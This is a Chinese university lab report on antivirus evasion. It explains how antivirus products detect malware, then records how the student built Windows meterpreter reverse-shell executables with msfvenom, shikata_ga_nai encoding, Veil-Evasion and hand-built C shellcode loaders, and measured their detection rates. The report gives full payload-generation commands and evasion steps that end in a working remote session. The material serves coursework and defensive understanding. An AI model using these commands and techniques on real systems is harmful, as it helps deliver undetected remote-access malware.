20145238-荊玉茗 《網絡對抗》免殺原理與實踐

20145238荊玉茗-《網絡攻防》-免殺原理與實踐

1、基礎問題回答

（1）殺軟是如何檢測出惡意代碼的？
答：經過三種方式查殺惡意代碼，①基於特徵碼：檢測一段代碼；②啓發式檢測：解決單一的特徵碼對比的缺陷；③基於行爲的惡意代碼：監控修改文件硬盤、連網鏈接惡意網站等。
（2）免殺是作什麼？
答：就是不讓殺毒軟件查出來的厲害病毒。
（3）免殺的基本方法有哪些？
答：①基於特徵碼：對於有.exe能夠加壓縮殼；對於shellcode能夠用encode編碼，對於奇偶位進行分別異或；②能夠本身手動編寫一個惡意軟件；③對於攻擊行爲：反彈式連接；使用隧道技術。

2、實踐總結與體會

• 經過本次實驗讓我對之前徹底依賴的殺毒軟件產生了質疑，連咱們編寫的最基本的病毒，有些殺毒軟件還查不出來，，，本次實驗也讓我瞭解了殺毒軟件的工做原理，分析其工做原理編寫免殺程序。之前高不可攀的應用現狀我也能大概掌握其工做原理，術業有專攻，要想真的做爲一名出色的信息安全工做者，那他也必定是一位出色的hacker。

3、離實戰還缺些什麼技術或步驟？

• 經過殺毒軟件檢測結果有些編碼後的病毒居然查殺率大於病毒自己，就說明咱們一些熟悉的編碼早已應用於各類殺軟。咱們必須創新出本身的方式。
• 對於查殺率最低的手工打造病毒，對咱們的編程能力以及不少數學、密碼等專業知識的要求很高，咱們的水平仍是很是有限。
• 反彈式連接是基礎。

4、實踐過程記錄

1.msfvenom直接生成meterpreter可執行文件

• win10的IP：192.168.2.132
• kali的IP：192.168.228.128

• 在kali中生成meterpreter的可執行文件sos.exe，使用ncat傳輸至主機。（上次實驗傳過來的我還沒刪~就不演示了。）
  

• 使用http://www.virscan.org/網站監測殺軟查殺病毒的能力。（注意這裏上傳的文件不能夠以中文及數字開頭哦）
  

• 感受我這個不是特別毒，才46%，但這明明就是一個裸毒啊！反正說沒有病毒的殺毒軟件應該都是假的了。

2.Msfvenom使用編碼器生成可執行文件

僅一次編碼
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=192.168.228.128 LPORT=5238 -f exe > ms1.exe

• 再看看他檢查的結果（納尼！比上次直接生成的可執行文件還高，看來這個編譯器比源文件被更多的殺軟公司標示了...）
  

屢次編碼嘗試
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.228.128 LPORT=5238 -f exe > ms2.exe

• 再來看看檢查結果（結果仍是很高，沒錯說明不少殺毒軟件對於編碼病毒識別較高）
  

• 對比兩次咱們還發現這三次生成的可執行文件的大小都是同樣的，只有payload的大小會增長。可能這樣不容易被發現。

3.Veil-Evasion生成可執行文件

• 輸入use python/meterpreter/rev_tcp
• 輸入set LHOST kali的IP
• 輸入generate
• 輸入生成可執行文件的名字這裏是5238sos.exe
• 選python語言編寫
• 在它說的位置找到可執行文件

• 找不到位置怎麼辦cp 複製路徑 ~/你能找到的文件夾
  

• 來看看檢測結果（效果仍是很是明顯的，還有百分之25的殺軟檢測出來了）
  

4.使用C語言調用shellcode

（手工打造病毒）（不是特別手工）
使用命令生成一個c語言格式的Shellcode數組
*此內容已被刪除

• vi建立一個C文件，mssc5238.c，將數組寫入文件中，加上主函數。
  *此處省略好多字

• 使用命令該C語言代碼mssc5238.c轉換爲一個可在64位windows系統下操做的可執行文件mssc5238.exe
  

• 檢查一下，有8個殺毒軟件檢測出病毒，是如今作的病毒中最不容易被檢測的一個了。
  

採用逆序修改shellcode

• 在windows中vs編寫一個C語言程序（參考GQ同窗代碼）

• 檢測一下（很不錯只有四款軟件檢查出了錯誤）
  

• 使用金山毒霸掃描一下，也成功躲過
  

• kali中msf成功，獲取權限